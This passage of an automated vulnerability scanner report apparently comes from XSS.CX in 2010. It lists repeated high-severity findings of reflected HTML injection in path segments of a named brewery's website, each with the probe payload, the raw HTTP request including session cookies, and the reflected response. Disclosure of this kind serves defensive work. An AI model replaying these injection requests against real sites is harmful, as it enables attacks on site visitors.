Path:	/process/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3479d"><a>5af2bfd9467 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process3479d"><a>5af2bfd9467/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="process3479d"><a>5af2bfd9467_page" class="process3479d">
...[SNIP]...

1.217. http://www.ninkasibrewing.com/process/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/process/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec8c"><a>3f99d872435 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process8ec8c"><a>3f99d872435/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="process8ec8c"><a>3f99d872435_page" class="process8ec8c">
...[SNIP]...

1.218. http://www.ninkasibrewing.com/tasting_room/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/tasting_room/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 382ed"><a>c4b55899033 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room382ed"><a>c4b55899033/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="tasting_room382ed"><a>c4b55899033_page" class="tasting_room382ed">
...[SNIP]...

1.219. http://www.ninkasibrewing.com/tasting_room/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/tasting_room/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e70ae"><a>5db925a41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_roome70ae"><a>5db925a41c/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="tasting_roome70ae"><a>5db925a41c_page" class="tasting_roome70ae">
...[SNIP]...

1.220. http://www.ninkasibrewing.com/tasting_room/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/tasting_room/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a066"><a>6e1291e293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room8a066"><a>6e1291e293b/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="tasting_room8a066"><a>6e1291e293b_page" class="tasting_room8a066">
...[SNIP]...

1.221. http://www.ninkasibrewing.com/tasting_room/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/tasting_room/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a74a"><a>886f2be4379 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room7a74a"><a>886f2be4379/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="tasting_room7a74a"><a>886f2be4379_page" class="tasting_room7a74a">
...[SNIP]...

1.222. http://www.ninkasibrewing.com/tasting_room/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/tasting_room/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b45d"><a>58a95621c51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room2b45d"><a>58a95621c51/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="tasting_room2b45d"><a>58a95621c51_page" class="tasting_room2b45d">
...[SNIP]...

1.223. http://www.ninkasibrewing.com/tasting_room/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/tasting_room/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63aa8"><a>d20e97deba5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room63aa8"><a>d20e97deba5/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="tasting_room63aa8"><a>d20e97deba5_page" class="tasting_room63aa8">
...[SNIP]...

1.224. http://www.ninkasibrewing.com/tasting_room/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/tasting_room/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 229d9"><a>4dc96b2a07e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room229d9"><a>4dc96b2a07e/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="tasting_room229d9"><a>4dc96b2a07e_page" class="tasting_room229d9">
...[SNIP]...

1.225. http://www.ninkasibrewing.com/twitter/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/twitter/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9914"><a>7fd5a5d0d72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterd9914"><a>7fd5a5d0d72/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="twitterd9914"><a>7fd5a5d0d72_page" class="twitterd9914">
...[SNIP]...

1.226. http://www.ninkasibrewing.com/twitter/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/twitter/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb286"><a>ad9894bb919 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twittereb286"><a>ad9894bb919/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="twittereb286"><a>ad9894bb919_page" class="twittereb286">
...[SNIP]...

1.227. http://www.ninkasibrewing.com/twitter/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/twitter/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89ac"><a>3fe204e99a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterf89ac"><a>3fe204e99a2/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="twitterf89ac"><a>3fe204e99a2_page" class="twitterf89ac">
...[SNIP]...

1.228. http://www.ninkasibrewing.com/twitter/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/twitter/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe021"><a>ac6878c8598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterfe021"><a>ac6878c8598/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="twitterfe021"><a>ac6878c8598_page" class="twitterfe021">
...[SNIP]...

1.229. http://www.ninkasibrewing.com/twitter/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/twitter/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b875"><a>10326ad19f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitter5b875"><a>10326ad19f9/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="twitter5b875"><a>10326ad19f9_page" class="twitter5b875">
...[SNIP]...

1.230. http://www.ninkasibrewing.com/twitter/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/twitter/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f23d0"><a>4971b5e26ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterf23d0"><a>4971b5e26ce/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="twitterf23d0"><a>4971b5e26ce_page" class="twitterf23d0">
...[SNIP]...

1.231. http://www.ninkasibrewing.com/twitter/content/js/combined.js [REST URL parameter 1] previous

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/twitter/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb490"><a>66876d9e15c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterfb490"><a>66876d9e15c/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="twitterfb490"><a>66876d9e15c_page" class="twitterfb490">
...[SNIP]...

Report generated by XSS.CX at Sun Nov 21 16:51:53 CST 2010.

<